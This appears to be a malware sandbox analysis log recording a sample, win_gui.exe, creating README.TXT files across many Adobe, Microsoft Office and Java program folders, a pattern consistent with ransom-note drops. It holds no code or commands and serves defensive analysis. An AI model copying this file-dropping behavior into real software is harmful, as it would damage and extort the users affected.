Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\security\policy\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\images\cursors\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\Publisher\Backgrounds\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\Bibliography\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\DataServices\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\PUBFTSCM\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\PUBSPAPR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\QuickStyles\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\Access\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\GettingStarted16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\ONENOTE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\Fonts\private\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\DESIGNER\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\ODBC\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\System\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX64\Microsoft Office\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\Microsoft Office\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\Microsoft SQL Server\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Apply\FilesInUse\BBF7ACC0-31FF-4C15-B05C-7341014DF78A\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\Power Map Excel Add-in\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\Power View Excel Add-in\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\PowerPivot Excel Add-in\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\PowerPivot Excel Add-inv16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Download\PackageFiles\BBF7ACC0-31FF-4C15-B05C-7341014DF78A\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Bibliography\Sort\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Bibliography\Style\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\CONVERT\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Document Parts\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FORMS\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\DCF\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\DCF\en\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Library\Analysis\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Library\SOLVER\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCard\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCardRollback\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\Advanced\Images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ar\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\bg\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ca\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\cs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\da\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\de\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\el\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\en-us\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\es\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\et\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\eu\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\fi\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\fr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\gl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\he\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\hi\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\hr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\hu\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\id\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\it\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ja\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\kk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ko\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\lt\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\lv\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ms\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\nl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\no\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\pl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\pt\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\pt-BR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ro\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ru\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sr-Cyrl-BA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sr-Cyrl-RS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sr-Latn-RS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sv\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\th\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\tr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\uk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\vi\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\zh-CN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\zh-TW\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ODBC Drivers\Salesforce\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OutlookReactNative\SearchView\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\TextInputIntelligence\en-us\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000002\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000006\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000011\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000018\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000027\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000042\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000043\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000049\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000050\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000054\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000055\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000058\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000062\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000063\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000064\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000068\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000069\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000070\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000072\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000076\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000079\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000083\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000084\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000087\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000088\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000099\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000098\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000101\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000104\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000105\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000106\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000107\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000108\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000109\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000113\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000117\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000118\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000119\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000120\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000122\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000123\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\fa000000124\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000125\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000128\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\fa000000129\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000130\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000131\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000132\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000135\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000137\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000138\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000139\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000140\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000141\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000142\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000144\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000145\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\ICU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\fonts\README.TXTJump to behavior
